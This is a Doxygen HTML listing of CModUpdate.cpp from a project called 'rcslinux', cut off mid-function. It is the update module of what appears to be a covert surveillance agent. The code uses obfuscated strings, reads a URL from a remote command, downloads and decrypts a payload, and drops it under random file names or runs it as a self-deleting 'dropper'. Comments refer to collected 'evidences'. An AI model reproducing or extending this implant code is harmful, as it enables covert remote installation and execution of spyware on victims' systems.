<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.18"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<title>rcslinux: plugins/modupdate/CModUpdate.cpp Source File</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/searchdata.js"></script>
<script type="text/javascript" src="search/search.js"></script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
 <tbody>
 <tr style="height: 56px;">
  <td id="projectalign" style="padding-left: 0.5em;">
   <div id="projectname">rcslinux
   </div>
  </td>
 </tr>
 </tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.18 -->
<script type="text/javascript">
/* @license magnet:?xt=urn:btih:cf05388f2679ee054f2beb29a391d25f4e673ac3&amp;dn=gpl-2.0.txt GPL-v2 */
var searchBox = new SearchBox("searchBox", "search",false,'Search');
/* @license-end */
</script>
<script type="text/javascript" src="menudata.js"></script>
<script type="text/javascript" src="menu.js"></script>
<script type="text/javascript">
/* @license magnet:?xt=urn:btih:cf05388f2679ee054f2beb29a391d25f4e673ac3&amp;dn=gpl-2.0.txt GPL-v2 */
$(function() {
  initMenu('',true,false,'search.php','Search');
  $(document).ready(function() { init_search(); });
});
/* @license-end */</script>
<div id="main-nav"></div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
     onmouseover="return searchBox.OnSearchSelectShow()"
     onmouseout="return searchBox.OnSearchSelectHide()"
     onkeydown="return searchBox.OnSearchSelectKey(event)">
</div>

<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0" 
        name="MSearchResults" id="MSearchResults">
</iframe>
</div>

<div id="nav-path" class="navpath">
  <ul>
<li class="navelem"><a class="el" href="dir_38c8d24aef3972a7f87b834274e76e31.html">plugins</a></li><li class="navelem"><a class="el" href="dir_fa0699ba140f9f077d6d13428027dbcd.html">modupdate</a></li>  </ul>
</div>
</div><!-- top -->
<div class="header">
  <div class="headertitle">
<div class="title">CModUpdate.cpp</div>  </div>
</div><!--header-->
<div class="contents">
<a href="CModUpdate_8cpp.html">Go to the documentation of this file.</a><div class="fragment"><div class="line"><a name="l00001"></a><span class="lineno">    1</span>&#160;<span class="comment">//</span></div>
<div class="line"><a name="l00002"></a><span class="lineno">    2</span>&#160;<span class="comment">// Created by jrf/ht on 15/04/19.</span></div>
<div class="line"><a name="l00003"></a><span class="lineno">    3</span>&#160;<span class="comment">//</span></div>
<div class="line"><a name="l00004"></a><span class="lineno">    4</span>&#160; </div>
<div class="line"><a name="l00005"></a><span class="lineno">    5</span>&#160;<span class="preprocessor">#include &quot;<a class="code" href="CModUpdate_8h.html">CModUpdate.h</a>&quot;</span></div>
<div class="line"><a name="l00006"></a><span class="lineno">    6</span>&#160;<span class="preprocessor">#include &lt;<a class="code" href="bdutils_8h.html">bdutils.h</a>&gt;</span></div>
<div class="line"><a name="l00007"></a><span class="lineno">    7</span>&#160;<span class="preprocessor">#include &lt;<a class="code" href="ICore_8h.html">ICore.h</a>&gt;</span></div>
<div class="line"><a name="l00008"></a><span class="lineno">    8</span>&#160;<span class="preprocessor">#include &lt;<a class="code" href="CAgentRemoteCmdUtils_8h.html">modremotecmd/CAgentRemoteCmdUtils.h</a>&gt;</span></div>
<div class="line"><a name="l00009"></a><span class="lineno">    9</span>&#160; </div>
<div class="line"><a name="l00010"></a><span class="lineno">   10</span>&#160;<span class="keyword">using namespace </span><a class="code" href="namespaceBdUtils.html">BdUtils</a>;</div>
<div class="line"><a name="l00011"></a><span class="lineno">   11</span>&#160;<span class="keyword">using namespace </span><a class="code" href="namespaceAgentCore.html">AgentCore</a>;</div>
<div class="line"><a name="l00012"></a><span class="lineno">   12</span>&#160;<span class="keyword">using namespace </span><a class="code" href="namespaceAgentPlugin.html">AgentPlugin</a>;</div>
<div class="line"><a name="l00013"></a><span class="lineno">   13</span>&#160;<span class="keyword">using namespace </span><a class="code" href="namespaceAgentPluginPrivate.html">AgentPluginPrivate</a>;</div>
<div class="line"><a name="l00014"></a><span class="lineno">   14</span>&#160; </div>
<div class="line"><a name="l00015"></a><span class="lineno">   15</span>&#160;<span class="comment">// the plugin name</span></div>
<div class="line"><a name="l00016"></a><span class="lineno">   16</span>&#160;<span class="preprocessor">#define PLUGIN_NAME &quot;modupdate&quot;</span></div>
<div class="line"><a name="l00017"></a><span class="lineno"><a class="line" href="CModUpdate_8cpp.html#a0acf7475326cdcd31d690b72033de33a">   17</a></span>&#160; </div>
<div class="line"><a name="l00021"></a><span class="lineno"><a class="line" href="CModUpdate_8cpp.html#a059b25eae0c9691ffc03478bef362549">   21</a></span>&#160;<span class="keyword">extern</span> <span class="stringliteral">&quot;C&quot;</span> <a class="code" href="classAgentPlugin_1_1IPlugin.html">IPlugin</a> *<a class="code" href="CModUpdate_8cpp.html#a059b25eae0c9691ffc03478bef362549">instance</a>() {</div>
<div class="line"><a name="l00022"></a><span class="lineno">   22</span>&#160;    <span class="keywordflow">if</span> (<a class="code" href="CPluginBase_8cpp.html#ac294a95d63deba8831a754100349423d">_instance</a> == <span class="keyword">nullptr</span>) {</div>
<div class="line"><a name="l00023"></a><span class="lineno">   23</span>&#160;        <a class="code" href="CPluginBase_8cpp.html#ac294a95d63deba8831a754100349423d">_instance</a> = <span class="keyword">new</span> <a class="code" href="classAgentPluginPrivate_1_1CModUpdate.html">CModUpdate</a>();</div>
<div class="line"><a name="l00024"></a><span class="lineno">   24</span>&#160;    }</div>
<div class="line"><a name="l00025"></a><span class="lineno">   25</span>&#160;    <span class="keywordflow">return</span> <a class="code" href="CPluginBase_8cpp.html#ac294a95d63deba8831a754100349423d">_instance</a>;</div>
<div class="line"><a name="l00026"></a><span class="lineno">   26</span>&#160;}</div>
<div class="line"><a name="l00027"></a><span class="lineno">   27</span>&#160; </div>
<div class="line"><a name="l00028"></a><span class="lineno"><a class="line" href="classAgentPluginPrivate_1_1CModUpdate.html#ae2c60c0f2b7bd0e5d951b8fb0ec09d1a">   28</a></span>&#160;<a class="code" href="classAgentPluginPrivate_1_1CModUpdate.html#ae2c60c0f2b7bd0e5d951b8fb0ec09d1a">AgentPluginPrivate::CModUpdate::CModUpdate</a>() : <a class="code" href="classAgentPluginPrivate_1_1CPluginBase.html">CPluginBase</a>(<a class="code" href="obfuscate_8h.html#aeb960253580086e334d4f65300c10256">vxENCRYPT</a>(<a class="code" href="CModUpdate_8cpp.html#a0acf7475326cdcd31d690b72033de33a">PLUGIN_NAME</a>)) {</div>
<div class="line"><a name="l00029"></a><span class="lineno">   29</span>&#160;    <a class="code" href="CLog_8h.html#a989e37701588731748694b31a0b424db">DBGLOGV</a>(<span class="keyword">nullptr</span>);</div>
<div class="line"><a name="l00030"></a><span class="lineno">   30</span>&#160; </div>
<div class="line"><a name="l00031"></a><span class="lineno">   31</span>&#160;    <span class="comment">// initialize network support</span></div>
<div class="line"><a name="l00032"></a><span class="lineno">   32</span>&#160;    CHttp::initHttpLib();</div>
<div class="line"><a name="l00033"></a><span class="lineno">   33</span>&#160;}</div>
<div class="line"><a name="l00034"></a><span class="lineno">   34</span>&#160; </div>
<div class="line"><a name="l00035"></a><span class="lineno"><a class="line" href="classAgentPluginPrivate_1_1CModUpdate.html#adfb83ca66dd70f0647d1824819cc7282">   35</a></span>&#160;<a class="code" href="classAgentPluginPrivate_1_1CModUpdate.html#adfb83ca66dd70f0647d1824819cc7282">AgentPluginPrivate::CModUpdate::~CModUpdate</a>() {</div>
<div class="line"><a name="l00036"></a><span class="lineno">   36</span>&#160;    <span class="comment">// deinitialize network support</span></div>
<div class="line"><a name="l00037"></a><span class="lineno">   37</span>&#160;    CHttp::deinitHttpLib();</div>
<div class="line"><a name="l00038"></a><span class="lineno">   38</span>&#160;}</div>
<div class="line"><a name="l00039"></a><span class="lineno">   39</span>&#160; </div>
<div class="line"><a name="l00040"></a><span class="lineno"><a class="line" href="classAgentPluginPrivate_1_1CModUpdate.html#a0aa8ec9014a3de40cd4fae350206e312">   40</a></span>&#160;<span class="keywordtype">int</span> <a class="code" href="classAgentPluginPrivate_1_1CModUpdate.html#a0aa8ec9014a3de40cd4fae350206e312">AgentPluginPrivate::CModUpdate::start</a>(<span class="keywordtype">void</span> *params) {</div>
<div class="line"><a name="l00041"></a><span class="lineno">   41</span>&#160;    <span class="keywordtype">int</span> res = <a class="code" href="classAgentPluginPrivate_1_1CPluginBase.html#a64ee7a236b4e8bc465581361e18ef26b">CPluginBase::start</a>(params);</div>
<div class="line"><a name="l00042"></a><span class="lineno">   42</span>&#160;    <span class="keywordflow">if</span> (res != 0) {</div>
<div class="line"><a name="l00043"></a><span class="lineno">   43</span>&#160;        <span class="comment">// can&#39;t start if already started</span></div>
<div class="line"><a name="l00044"></a><span class="lineno">   44</span>&#160;        <span class="keywordflow">return</span> res;</div>
<div class="line"><a name="l00045"></a><span class="lineno">   45</span>&#160;    }</div>
<div class="line"><a name="l00046"></a><span class="lineno">   46</span>&#160; </div>
<div class="line"><a name="l00047"></a><span class="lineno">   47</span>&#160;    <span class="comment">// params is a json, already tested to be valid</span></div>
<div class="line"><a name="l00048"></a><span class="lineno">   48</span>&#160;    <a class="code" href="classBdUtils_1_1CJson.html">CJson</a>* js = <span class="keyword">new</span> <a class="code" href="classBdUtils_1_1CJson.html">CJson</a>((<span class="keywordtype">char</span>*)params);</div>
<div class="line"><a name="l00049"></a><span class="lineno">   49</span>&#160;    <span class="keyword">const</span> <span class="keywordtype">char</span>* module = js-&gt;<a class="code" href="classBdUtils_1_1CJson.html#ad055b1a97d7a1afe376dd68389929582">getStringValue</a>(<a class="code" href="obfuscate_8h.html#aeb960253580086e334d4f65300c10256">vxENCRYPT</a>(<span class="stringliteral">&quot;module&quot;</span>),&amp;module);</div>
<div class="line"><a name="l00050"></a><span class="lineno">   50</span>&#160;    <span class="keyword">const</span> <span class="keywordtype">char</span>* url = js-&gt;<a class="code" href="classBdUtils_1_1CJson.html#ad055b1a97d7a1afe376dd68389929582">getStringValue</a>(<a class="code" href="obfuscate_8h.html#aeb960253580086e334d4f65300c10256">vxENCRYPT</a>(<span class="stringliteral">&quot;url&quot;</span>),&amp;url);</div>
<div class="line"><a name="l00051"></a><span class="lineno">   51</span>&#160;    <span class="keywordflow">if</span> (strcmp(module, <span class="stringliteral">&quot;*&quot;</span>) == 0) {</div>
<div class="line"><a name="l00052"></a><span class="lineno">   52</span>&#160;        <span class="comment">// core update</span></div>
<div class="line"><a name="l00053"></a><span class="lineno">   53</span>&#160;        res = upgrade(url);</div>
<div class="line"><a name="l00054"></a><span class="lineno">   54</span>&#160;    }</div>
<div class="line"><a name="l00055"></a><span class="lineno">   55</span>&#160;    <span class="keywordflow">else</span> {</div>
<div class="line"><a name="l00056"></a><span class="lineno">   56</span>&#160;        <span class="comment">// single plugin update</span></div>
<div class="line"><a name="l00057"></a><span class="lineno">   57</span>&#160;        res = upgrade(url, module);</div>
<div class="line"><a name="l00058"></a><span class="lineno">   58</span>&#160;    }</div>
<div class="line"><a name="l00059"></a><span class="lineno">   59</span>&#160; </div>
<div class="line"><a name="l00060"></a><span class="lineno">   60</span>&#160;    <span class="comment">// done</span></div>
<div class="line"><a name="l00061"></a><span class="lineno">   61</span>&#160;    stop(params);</div>
<div class="line"><a name="l00062"></a><span class="lineno">   62</span>&#160;    <span class="keywordflow">return</span> res;</div>
<div class="line"><a name="l00063"></a><span class="lineno">   63</span>&#160;}</div>
<div class="line"><a name="l00064"></a><span class="lineno">   64</span>&#160; </div>
<div class="line"><a name="l00065"></a><span class="lineno"><a class="line" href="classAgentPluginPrivate_1_1CModUpdate.html#a15ab0ea07a84c66c2aca14e6a12bf823">   65</a></span>&#160;<span class="keywordtype">int</span> <a class="code" href="classAgentPluginPrivate_1_1CModUpdate.html#a15ab0ea07a84c66c2aca14e6a12bf823">AgentPluginPrivate::CModUpdate::stop</a>(<span class="keywordtype">void</span> *params) {</div>
<div class="line"><a name="l00066"></a><span class="lineno">   66</span>&#160;    <a class="code" href="classAgentPluginPrivate_1_1CPluginBase.html#a6ae9bc38da76381cf42c462e5e2db085">CPluginBase::stop</a>(params);</div>
<div class="line"><a name="l00067"></a><span class="lineno">   67</span>&#160;    <span class="keywordflow">return</span> 0;</div>
<div class="line"><a name="l00068"></a><span class="lineno">   68</span>&#160;}</div>
<div class="line"><a name="l00069"></a><span class="lineno">   69</span>&#160; </div>
<div class="line"><a name="l00070"></a><span class="lineno"><a class="line" href="classAgentPluginPrivate_1_1CModUpdate.html#ae95827402322ae6e749eb14f17949210">   70</a></span>&#160;<span class="keywordtype">int</span> <a class="code" href="classAgentPluginPrivate_1_1CModUpdate.html#ae95827402322ae6e749eb14f17949210">AgentPluginPrivate::CModUpdate::init</a>(<a class="code" href="classAgentCore_1_1ICore.html">AgentCore::ICore</a> *core, <a class="code" href="structAgentPlugin_1_1__PluginInitStruct.html">AgentPlugin::PluginInitStruct</a> *params) {</div>
<div class="line"><a name="l00071"></a><span class="lineno">   71</span>&#160;    _type = <a class="code" href="group__PLUGINS__INTERNAL.html#ga1041ad5edc0a7e6b0dc4ff7cffaf332e">PLUGIN_TYPE_GENERIC</a>;</div>
<div class="line"><a name="l00072"></a><span class="lineno">   72</span>&#160;    <a class="code" href="classAgentPluginPrivate_1_1CPluginBase.html#ae911813ab8976f3c8700e0f9e1425c63">CPluginBase::init</a>(core, params);</div>
<div class="line"><a name="l00073"></a><span class="lineno">   73</span>&#160;    <span class="keywordflow">return</span> 0;</div>
<div class="line"><a name="l00074"></a><span class="lineno">   74</span>&#160;}</div>
<div class="line"><a name="l00075"></a><span class="lineno">   75</span>&#160; </div>
<div class="line"><a name="l00083"></a><span class="lineno"><a class="line" href="classAgentPluginPrivate_1_1CModUpdate.html#adddc9d80588d19c952b6cfffd4f2b62c">   83</a></span>&#160;<span class="keywordtype">int</span> <a class="code" href="classAgentPluginPrivate_1_1CModUpdate.html#adddc9d80588d19c952b6cfffd4f2b62c">CModUpdate::upgrade</a>(<span class="keyword">const</span> <span class="keywordtype">char</span>* url, <span class="keyword">const</span> <span class="keywordtype">char</span>* internalName) {</div>
<div class="line"><a name="l00084"></a><span class="lineno">   84</span>&#160;    <span class="comment">// download file to memory</span></div>
<div class="line"><a name="l00085"></a><span class="lineno">   85</span>&#160;    <span class="keywordtype">int</span> res = 0;</div>
<div class="line"><a name="l00086"></a><span class="lineno">   86</span>&#160;    uint64_t downloadedSize = 0;</div>
<div class="line"><a name="l00087"></a><span class="lineno">   87</span>&#160;    uint8_t* downloadedBuffer = <span class="keyword">nullptr</span>;</div>
<div class="line"><a name="l00088"></a><span class="lineno">   88</span>&#160;    uint8_t* upgradeBuffer = <span class="keyword">nullptr</span>;</div>
<div class="line"><a name="l00089"></a><span class="lineno">   89</span>&#160;    uint32_t upgradeSize = 0;</div>
<div class="line"><a name="l00090"></a><span class="lineno">   90</span>&#160;    <span class="keywordtype">char</span>* plgPath = <span class="keyword">nullptr</span>;</div>
<div class="line"><a name="l00091"></a><span class="lineno">   91</span>&#160;    <span class="keywordflow">do</span> {</div>
<div class="line"><a name="l00092"></a><span class="lineno">   92</span>&#160;        <span class="comment">// download update buffer to a temporary file</span></div>
<div class="line"><a name="l00093"></a><span class="lineno">   93</span>&#160;        res = CHttp::get(url, &amp;downloadedBuffer, &amp;downloadedSize);</div>
<div class="line"><a name="l00094"></a><span class="lineno">   94</span>&#160;        <span class="keywordflow">if</span> (res != 0) {</div>
<div class="line"><a name="l00095"></a><span class="lineno">   95</span>&#160;            <a class="code" href="CLog_8h.html#a6116789398e26a1c2bc635117a2e4960">DBGLOGE</a>(<span class="stringliteral">&quot;failed downloading update from %s&quot;</span>, url);</div>
<div class="line"><a name="l00096"></a><span class="lineno">   96</span>&#160;            <span class="keywordflow">break</span>;</div>
<div class="line"><a name="l00097"></a><span class="lineno">   97</span>&#160;        }</div>
<div class="line"><a name="l00098"></a><span class="lineno">   98</span>&#160; </div>
<div class="line"><a name="l00099"></a><span class="lineno">   99</span>&#160;        <span class="comment">// decrypt update</span></div>
<div class="line"><a name="l00100"></a><span class="lineno">  100</span>&#160;        <span class="keyword">const</span> uint8_t* fallbackKey = <a class="code" href="classAgentPluginPrivate_1_1CPluginBase.html#a3460f627cc56a1519648a9bdda87d805">_core</a>-&gt;<a class="code" href="classAgentCore_1_1ICore.html#adb8fdbcd57b38c6b929b6fd1017d5766">bp</a>()-&gt;<a class="code" href="classAgentCore_1_1IBinaryPatch.html#a7caf7743d0da8989be2326ec727e6364">fallbackKey</a>();</div>
<div class="line"><a name="l00101"></a><span class="lineno">  101</span>&#160;        uint8_t* deviceKey = <a class="code" href="classAgentPluginPrivate_1_1CPluginBase.html#a3460f627cc56a1519648a9bdda87d805">_core</a>-&gt;<a class="code" href="classAgentCore_1_1ICore.html#a89715d5346c9c19ab665394aba9e291c">deviceKey</a>();</div>
<div class="line"><a name="l00102"></a><span class="lineno">  102</span>&#160;        res = <a class="code" href="classAgentPluginPrivate_1_1CAgentRemoteCmdUtils.html#a87e3401608c06dff3855b987ada2fa3b">CAgentRemoteCmdUtils::decryptRemoteCmd</a>(deviceKey, (uint8_t*)fallbackKey, downloadedBuffer, downloadedSize, &amp;upgradeBuffer, &amp;upgradeSize);</div>
<div class="line"><a name="l00103"></a><span class="lineno">  103</span>&#160;        <span class="keywordflow">if</span> (res != 0) {</div>
<div class="line"><a name="l00104"></a><span class="lineno">  104</span>&#160;            <span class="keywordflow">break</span>;</div>
<div class="line"><a name="l00105"></a><span class="lineno">  105</span>&#160;        }</div>
<div class="line"><a name="l00106"></a><span class="lineno">  106</span>&#160; </div>
<div class="line"><a name="l00107"></a><span class="lineno">  107</span>&#160;        <span class="comment">// full or plugin upgrade ?</span></div>
<div class="line"><a name="l00108"></a><span class="lineno">  108</span>&#160;        <span class="keywordflow">if</span> (<a class="code" href="classAgentPluginPrivate_1_1CPluginBase.html#a5d56f0844f3dc55b5e93206418a9397b">internalName</a> == <span class="keyword">nullptr</span>) {</div>
<div class="line"><a name="l00109"></a><span class="lineno">  109</span>&#160;            <span class="comment">// dump to temp</span></div>
<div class="line"><a name="l00110"></a><span class="lineno">  110</span>&#160;            CFile::temporaryFilePath(&amp;plgPath);</div>
<div class="line"><a name="l00111"></a><span class="lineno">  111</span>&#160;            res = CFile::fromBuffer(plgPath, upgradeBuffer, upgradeSize);</div>
<div class="line"><a name="l00112"></a><span class="lineno">  112</span>&#160;            <span class="keywordflow">if</span> (res != 0) {</div>
<div class="line"><a name="l00113"></a><span class="lineno">  113</span>&#160;                <a class="code" href="CLog_8h.html#a6116789398e26a1c2bc635117a2e4960">DBGLOGE</a>(<span class="stringliteral">&quot;failed writing full update dropper, path=%s, res=%d&quot;</span>, plgPath, res);</div>
<div class="line"><a name="l00114"></a><span class="lineno">  114</span>&#160;                <span class="keywordflow">break</span>;</div>
<div class="line"><a name="l00115"></a><span class="lineno">  115</span>&#160;            }</div>
<div class="line"><a name="l00116"></a><span class="lineno">  116</span>&#160; </div>
<div class="line"><a name="l00117"></a><span class="lineno">  117</span>&#160;            <span class="comment">// full upgrade, core will shutdown leaving evidences and configuration</span></div>
<div class="line"><a name="l00118"></a><span class="lineno">  118</span>&#160;            <span class="comment">// dropper must check until the path passed on its commandline exists, before performing the actual upgrade and relaunch the new core.\n</span></div>
<div class="line"><a name="l00119"></a><span class="lineno">  119</span>&#160;            <span class="comment">// it must also delete itself when done!</span></div>
<div class="line"><a name="l00120"></a><span class="lineno">  120</span>&#160;            <a class="code" href="classAgentPluginPrivate_1_1CPluginBase.html#a3460f627cc56a1519648a9bdda87d805">_core</a>-&gt;<a class="code" href="classAgentCore_1_1ICore.html#a323c207478526f7f6a8393f698d81d55">setUpgrading</a>();</div>
<div class="line"><a name="l00121"></a><span class="lineno">  121</span>&#160;            res = CProcess::run(plgPath, <a class="code" href="classAgentPluginPrivate_1_1CPluginBase.html#a3460f627cc56a1519648a9bdda87d805">_core</a>-&gt;<a class="code" href="classAgentCore_1_1ICore.html#a1cdf086cc83f68a0fa6047f8dc711462">corePath</a>(), <span class="keyword">true</span>);</div>
<div class="line"><a name="l00122"></a><span class="lineno">  122</span>&#160;            <span class="keywordflow">if</span> (res != 0) {</div>
<div class="line"><a name="l00123"></a><span class="lineno">  123</span>&#160;                <a class="code" href="CLog_8h.html#a6116789398e26a1c2bc635117a2e4960">DBGLOGE</a>(<span class="stringliteral">&quot;failed executing dropper, path=%s, res=%d&quot;</span>, plgPath, res);</div>
<div class="line"><a name="l00124"></a><span class="lineno">  124</span>&#160;                <span class="keywordflow">break</span>;</div>
<div class="line"><a name="l00125"></a><span class="lineno">  125</span>&#160;            }</div>
<div class="line"><a name="l00126"></a><span class="lineno">  126</span>&#160; </div>
<div class="line"><a name="l00127"></a><span class="lineno">  127</span>&#160;            <span class="comment">// core will close, the dropper will start the update process, and relaunch core</span></div>
<div class="line"><a name="l00128"></a><span class="lineno">  128</span>&#160;            <a class="code" href="classAgentPluginPrivate_1_1CPluginBase.html#a3460f627cc56a1519648a9bdda87d805">_core</a>-&gt;<a class="code" href="classAgentCore_1_1ICore.html#a3fac8e32c46d48ebd4c2f698b8848418">setClosing</a>();</div>
<div class="line"><a name="l00129"></a><span class="lineno">  129</span>&#160;        }</div>
<div class="line"><a name="l00130"></a><span class="lineno">  130</span>&#160;        <span class="keywordflow">else</span> {</div>
<div class="line"><a name="l00131"></a><span class="lineno">  131</span>&#160;            <span class="keywordtype">bool</span> selfUpdate = <span class="keyword">false</span>;</div>
<div class="line"><a name="l00132"></a><span class="lineno">  132</span>&#160;            <span class="keywordflow">if</span> (strcmp(<a class="code" href="classAgentPluginPrivate_1_1CPluginBase.html#a5d56f0844f3dc55b5e93206418a9397b">internalName</a>, <a class="code" href="CModUpdate_8cpp.html#a0acf7475326cdcd31d690b72033de33a">PLUGIN_NAME</a>) == 0) {</div>
<div class="line"><a name="l00133"></a><span class="lineno">  133</span>&#160;                <span class="comment">// we&#39;re updating modupdate</span></div>
<div class="line"><a name="l00134"></a><span class="lineno">  134</span>&#160;                <a class="code" href="CLog_8h.html#a111656e99a3f411e44b064c32a0d55af">DBGLOGW</a>(<span class="stringliteral">&quot;upgrading modupdate itself, effective upgrade will be on the next agent restart&quot;</span>);</div>
<div class="line"><a name="l00135"></a><span class="lineno">  135</span>&#160;                selfUpdate = <span class="keyword">true</span>;</div>
<div class="line"><a name="l00136"></a><span class="lineno">  136</span>&#160;            }</div>
<div class="line"><a name="l00137"></a><span class="lineno">  137</span>&#160; </div>
<div class="line"><a name="l00138"></a><span class="lineno">  138</span>&#160;            <span class="comment">// uninstall plugin (if existing)</span></div>
<div class="line"><a name="l00139"></a><span class="lineno">  139</span>&#160;            <a class="code" href="classAgentPlugin_1_1IPlugin.html">IPlugin</a>* p = <a class="code" href="classAgentPluginPrivate_1_1CPluginBase.html#a3460f627cc56a1519648a9bdda87d805">_core</a>-&gt;<a class="code" href="classAgentCore_1_1ICore.html#a99ee4fb74b941571a8abd2ec0490f57a">plgMgr</a>()-&gt;<a class="code" href="classAgentCore_1_1IPluginManager.html#a8d176472329b94c6b2a4a87994e3a007">findLoadedPlugin</a>(<a class="code" href="classAgentPluginPrivate_1_1CPluginBase.html#a5d56f0844f3dc55b5e93206418a9397b">internalName</a>);</div>
<div class="line"><a name="l00140"></a><span class="lineno">  140</span>&#160;            <span class="keywordflow">if</span> (p == <span class="keyword">nullptr</span>) {</div>
<div class="line"><a name="l00141"></a><span class="lineno">  141</span>&#160;                <span class="comment">// installing new plugin, write file</span></div>
<div class="line"><a name="l00142"></a><span class="lineno">  142</span>&#160;                <span class="keywordtype">char</span> rndString[33] = {0};</div>
<div class="line"><a name="l00143"></a><span class="lineno">  143</span>&#160;                CString::randomString(<a class="code" href="classAgentPluginPrivate_1_1CPluginBase.html#afd5f2c5be8d9fb41936a9e5f919fb2eb">rng</a>()-&gt;nextRand(8,16), rndString, <span class="keyword">sizeof</span>(rndString));</div>
<div class="line"><a name="l00144"></a><span class="lineno">  144</span>&#160;                CString::joinPath(<a class="code" href="classAgentPluginPrivate_1_1CPluginBase.html#a3460f627cc56a1519648a9bdda87d805">_core</a>-&gt;<a class="code" href="classAgentCore_1_1ICore.html#a99ee4fb74b941571a8abd2ec0490f57a">plgMgr</a>()-&gt;<a class="code" href="classAgentCore_1_1IPluginManager.html#a78665e53fb97298c2663a21d395d1eb6">pluginsPath</a>(), rndString, &amp;plgPath);</div>
<div class="line"><a name="l00145"></a><span class="lineno">  145</span>&#160;                <a class="code" href="CLog_8h.html#a2b5d27a6100113b1a09dce32f08b6f07">DBGLOGI</a>(<span class="stringliteral">&quot;installing new plugin: %s, path=%s&quot;</span>, <a class="code" href="classAgentPluginPrivate_1_1CPluginBase.html#a5d56f0844f3dc55b5e93206418a9397b">internalName</a>, plgPath);</div>
<div class="line"><a name="l00146"></a><span class="lineno">  146</span>&#160;                res = <a class="code" href="classAgentPluginPrivate_1_1CPluginBase.html#a3460f627cc56a1519648a9bdda87d805">_core</a>-&gt;<a class="code" href="classAgentCore_1_1ICore.html#a99ee4fb74b941571a8abd2ec0490f57a">plgMgr</a>()-&gt;<a class="code" href="classAgentCore_1_1IPluginManager.html#a79dc5183eb3b3bd2acf7c210e4366139">writeAsset</a>(plgPath, upgradeBuffer, upgradeSize);</div>
<div class="line"><a name="l00147"></a><span class="lineno">  147</span>&#160;                <span class="keywordflow">if</span> (res != 0) {</div>
<div class="line"><a name="l00148"></a><span class="lineno">  148</span>&#160;                    <a class="code" href="CLog_8h.html#a6116789398e26a1c2bc635117a2e4960">DBGLOGE</a>(<span class="stringliteral">&quot;failed installing new plugin %s, path=%s&quot;</span>, <a class="code" href="classAgentPluginPrivate_1_1CPluginBase.html#a5d56f0844f3dc55b5e93206418a9397b">internalName</a>, plgPath);</div>
<div class="line"><a name="l00149"></a><span class="lineno">  149</span>&#160;                    <span class="keywordflow">break</span>;</div>
<div class="line"><a name="l00150"></a><span class="lineno">  150</span>&#160;                }</div>
<div class="line"><a name="l00151"></a><span class="lineno">  151</span>&#160;            }</div>
<div class="line"><a name="l00152"></a><span class="lineno">  152</span>&#160;            <span class="keywordflow">else</span> {</div>
<div class="line"><a name="l00153"></a><span class="lineno">  153</span>&#160;                <span class="comment">// upgrading, uninstall first</span></div>
<div class="line"><a name="l00154"></a><span class="lineno">  154</span>&#160;                plgPath = CString::dup(p-&gt;<a class="code" href="classAgentPlugin_1_1IPlugin.html#a1f783bc8ded1aded455f3b4e73329595">path</a>());</div>
<div class="line"><a name="l00155"></a><span class="lineno">  155</span>&#160;                <a class="code" href="classAgentPluginPrivate_1_1CPluginBase.html#a3460f627cc56a1519648a9bdda87d805">_core</a>-&gt;<a class="code" href="classAgentCore_1_1ICore.html#a99ee4fb74b941571a8abd2ec0490f57a">plgMgr</a>()-&gt;<a class="code" href="classAgentCore_1_1IPluginManager.html#a9ce40fc842d9dc049eb284f0a1f88f4c">uninstallPlugin</a>(<a class="code" href="classAgentPluginPrivate_1_1CPluginBase.html#a5d56f0844f3dc55b5e93206418a9397b">internalName</a>, !selfUpdate);</div>
<div class="line"><a name="l00156"></a><span class="lineno">  156</span>&#160;                <a class="code" href="CLog_8h.html#a2b5d27a6100113b1a09dce32f08b6f07">DBGLOGI</a>(<span class="stringliteral">&quot;upgrading existing plugin: %s, path=%s, selfupdate=%d&quot;</span>, <a class="code" href="classAgentPluginPrivate_1_1CPluginBase.html#a5d56f0844f3dc55b5e93206418a9397b">internalName</a>, plgPath, selfUpdate);</div>
<div class="line"><a name="l00157"></a><span class="lineno">  157</span>&#160;                res = <a class="code" href="classAgentPluginPrivate_1_1CPluginBase.html#a3460f627cc56a1519648a9bdda87d805">_core</a>-&gt;<a class="code" href="classAgentCore_1_1ICore.html#a99ee4fb74b941571a8abd2ec0490f57a">plgMgr</a>()-&gt;<a class="code" href="classAgentCore_1_1IPluginManager.html#a79dc5183eb3b3bd2acf7c210e4366139">writeAsset</a>(plgPath, upgradeBuffer, upgradeSize);</div>
<div class="line"><a name="l00158"></a><span class="lineno">  158</span>&#160;                <span class="keywordflow">if</span> (res != 0) {</div>
<div class="line"><a name="l00159"></a><span class="lineno">  159</span>&#160;                    <a class="code" href="CLog_8h.html#a6116789398e26a1c2bc635117a2e4960">DBGLOGE</a>(<span class="stringliteral">&quot;failed installing new plugin %s to %s&quot;</span>, <a class="code" href="classAgentPluginPrivate_1_1CPluginBase.html#a5d56f0844f3dc55b5e93206418a9397b">internalName</a>, plgPath);</div>
<div class="line"><a name="l00160"></a><span class="lineno">  160</span>&#160;                    <span class="keywordflow">break</span>;</div>
<div class="line"><a name="l00161"></a><span class="lineno">  161</span>&#160;                }</div>
<div class="line"><a name="l00162"></a><span class="lineno">  162</span>&#160;            }</div>
<div class="line"><a name="l00163"></a><span class="lineno">  163</span>&#160; </div>
<div class="line"><a name="l00164"></a><span class="lineno">  164</span>&#160;            <span class="keywordflow">if</span> (!selfUpdate) {</div>
<div class="line"><a name="l00165"></a><span class="lineno">  165</span>&#160;                <span class="comment">// start the plugin</span></div>
